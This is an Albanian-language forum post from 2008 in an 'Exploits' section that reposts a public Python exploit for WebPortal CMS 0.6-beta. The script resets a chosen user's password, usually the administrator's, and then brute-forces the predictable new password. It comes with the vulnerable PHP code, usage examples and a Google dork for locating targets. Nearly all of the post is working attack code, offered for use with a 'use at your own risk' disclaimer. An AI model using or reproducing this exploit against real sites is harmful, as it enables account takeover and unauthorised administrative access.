ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
ismajli komandat nika celular murlan genta kosoves meda dashurie numrin nokia gjata shkronja numri druri BAJRAM PORNO loja 2012 shqip anglisht double elvana krasniqi dashuri gashi
IP Addressa Juaj&Reklama
IP


Share | 
 

 WebPortal CMS 0.6-beta Remote Password Change Exploit

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: WebPortal CMS 0.6-beta Remote Password Change Exploit   Thu Jun 12, 2008 8:33 pm

#!/usr/bin/python#=========================================== ================================================== ====# # ____ __________ __ ____ __ ## /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ ## | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ ## | | | \ | |/ \ \___| | /_____/ | || | ## |___|___| /\__| /______ /\___ >__| |___||__| ## \/\______| \/ \/ ##================================================ =================================================# # This is a Public Exploit. ## Date: 04/01/2008 [dd,mm,yyyy] ## ## !!!Happy New Year!!! ## ##================================================ =================================================# # WebPortal-0.6-beta Cms And Maybe Lower Remote Password Change Exploit ## ## Vendor: webportal.ivanoculmine.com ## Severity: Highest ## Author: The:Paradox ##================================================ =================================================# # This exploit works with Magic Quotes = On ##================================================ =================================================# # Proud To Be Italian. ##================================================ =================================================# """ Related Codes: actions.php; line 14:elseif ($_GET["action"] == "lostpass") { $newpass = date("is").substr($user, 1, 2); $result = db_query ("SELECT * FROM ".$prefix."users WHERE uname='".$_POST["user_name"]."';"); if (db_num_rows($result) > 0) { $utente = db_fetch_array ($result); db_query ("UPDATE ".$prefix."users SET pass='".md5($newpass)."' WHERE id='".$utente["id"]."';"); """#============================================== ================================================== =## Proof Of Concept / Bug Explanation: ## ## This vulnerability is in actions.php and make us able to change the password of a victim user. ## The page is a "Password Recovery Tool", that sends a new generated password to user's email. ## It does an Update query (after a vulnerable SQL injection mq = OFF xD) setting as "pass" ## the $newpass variable. Let's look the code. ## ## $newpass = date("is").substr($user, 1, 2); # # ## The newpassword is simply the date (minute+seconds) and the var $user taken trought ## register_globals (we can let it empty). ## So look at your clock, recover the password, and get administator rights ! =D ## # # If get the exactly server date is a problem for you, i have coded a little bruteforcer ## (the new password is a 4 number sequence). # # # #================================================= ================================================## Post Request to "Recover Password" : # # # # POST /webportal-0.6-beta/actions.php?action=lostpass user_name=[UserName] ## ##================================================ =================================================# # WebPortal cms is a very bugged platform. Some pages and functions don't work with the server ## configuration Register_globals = Off , A LOT of sql injections with Magic Quotes = Off, ## Full path disclosoures ecc. ## Whatever this one is the most critical ('cause works with Mq=ON). ## Maybe I'll public a sql injection mq=Off. ##================================================ =================================================# # Google Dork=> Realizzato utilizzando Web Portal ##================================================ =================================================# # Use this at your own risk. You are responsible for your own deeds. ##================================================ =================================================# # Python Exploit Starts ##================================================ =================================================# import httplib, urllib, sysfrom string import replaceprint "\n############################################### #"print " WebPortal-0.6-beta Cms And Maybe Lower "print " Remote Password Change Exploit "print " Date Bruteforcer "print " "print " Discovered By The:Paradox " print " "print " Usage: " print " python %s [Target] [Path] [Username] " % (sys.argv[0])print " " print " Example: " print " python %s 127.0.0.1 /WebPortal/ Admin " % (sys.argv[0])print " python %s www.host.com / Admin " % (sys.argv[0]) print " " print " " print "################################################\ n"if len(sys.argv)<=3: sys.exit()else: print "[.]Exploit Starting." port = "80"target = sys.argv[1]path = sys.argv[2]username = sys.argv[3] #Resetting Passwordconn = httplib.HTTPConnection(target,port)conn.request("P OST", path + "actions.php?action=lostpass", urllib.urlencode({'user_name': username}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"})response = conn.getresponse()print "[.]Resetting Password -->",response.status, response.reasonconn.close()#If 404 error: die.if response.status == 404: sys.exit("[-]Unable to reset Password. Failed, Exiting.")#Let's Brute.print "[.]Bruteforcer Starts. This may take long time."for i in range(10000,19999): conn = httplib.HTTPConnection(target,port) conn.request("POST", path + "actions.php", urllib.urlencode({'uname': username,'pass': replace(str(i), "1", "", 1),"action" : "login"}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"}) response = conn.getresponse() header = response.getheader("location") if header.find("index.php?error=not_logged") == -1: sys.exit("\n\n[+]Gotcha! Password is: " + replace(str(i), "1", "", 1) + "\n\n-=Paradox Got This One=-\n")print "[-]Not Found. Exploit Failed."# milw0rm.com [2008-01-04]
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
WebPortal CMS 0.6-beta Remote Password Change Exploit
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: